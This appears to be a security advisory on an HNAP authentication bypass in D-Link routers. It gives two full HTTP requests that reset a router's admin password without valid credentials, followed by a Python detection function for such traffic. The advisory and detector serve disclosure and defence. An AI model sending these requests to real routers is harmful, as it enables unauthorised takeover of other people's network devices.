D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability
An attacker can exploit this issue by using readily available network utilities. The following example requests are available:

Example 1:

    POST /HNAP1/ HTTP/1.1
    Host: 192.168.0.1:8099
    SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"
    Content-Length: 453

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <soap:Body>
        <SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
          <AdminPassword>testing123</AdminPassword>
        </SetDeviceSettings>
      </soap:Body>
    </soap:Envelope>

Example 2:

    POST /HNAP1/ HTTP/1.1
    Authorization: Basic dXNlcjo=
    Host: 192.168.0.1
    SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
    Content-Length: 453

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <soap:Body>
        <SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
          <AdminPassword>testing123</AdminPassword>
        </SetDeviceSettings>
      </soap:Body>
    </soap:Envelope>
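A detection-side check for the two traits visible in the example requests above, added here as an illustration and not part of the original advisory: Example 1's SOAPAction header names GetDeviceSettings while the body carries SetDeviceSettings, and Example 2's Basic credentials decode to `user:` with an empty password. The function name, the constructed sample requests and the rule that `Set*` actions count as configuration changes are assumptions.

```python
import base64
import xml.etree.ElementTree as ET

SOAP_BODY = "{http://schemas.xmlsoap.org/soap/envelope/}Body"

def inspect_hnap_request(raw: str) -> list[str]:
    """Return findings for one captured HTTP request (headers plus body, as text)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    request = lines[0].split()
    if len(request) < 2 or request[0] != "POST" or not request[1].startswith("/HNAP1"):
        return []                                  # not an HNAP call
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    if "<!DOCTYPE" in body.upper():                # refuse DTDs before parsing untrusted XML
        return ["SOAP body contains a DTD"]
    try:
        body_action = ET.fromstring(body.strip().encode()).find(SOAP_BODY)[0].tag.rsplit("}", 1)[-1]
    except (ET.ParseError, TypeError, IndexError):
        return ["unparseable SOAP body"]
    header_action = headers.get("soapaction", "").strip('"').rstrip("/").rsplit("/", 1)[-1]
    findings = []
    if header_action != body_action:
        findings.append(f"SOAPAction names {header_action!r}, body carries {body_action!r}")
    if body_action.startswith("Set"):              # assumption: Set* actions change config
        auth = headers.get("authorization", "")
        if not auth:
            findings.append(f"{body_action} sent without Authorization header")
        elif auth.lower().startswith("basic "):
            try:
                creds = base64.b64decode(auth[6:].strip()).decode("utf-8", "replace")
            except ValueError:
                creds = ""
            user, _, password = creds.partition(":")
            if not password:
                findings.append(f"{body_action} sent with empty password for user {user!r}")
    return findings

# Constructed samples modelled on the two example requests above (password is a placeholder).
ENVELOPE = ('<?xml version="1.0" encoding="utf-8"?>'
            '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
            '<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">'
            '<AdminPassword>placeholder</AdminPassword></SetDeviceSettings></soap:Body></soap:Envelope>')
REQ = 'POST /HNAP1/ HTTP/1.1\n{}SOAPAction: "http://purenetworks.com/HNAP1/{}"\n\n' + ENVELOPE
EXAMPLE_1 = REQ.format("Host: 192.168.0.1:8099\n", "GetDeviceSettings")
EXAMPLE_2 = REQ.format("Authorization: Basic dXNlcjo=\nHost: 192.168.0.1\n", "SetDeviceSettings")
```

Run over proxy or packet-capture output, the function returns an empty list for non-HNAP traffic and for HNAP calls whose header and body agree and carry a non-empty password.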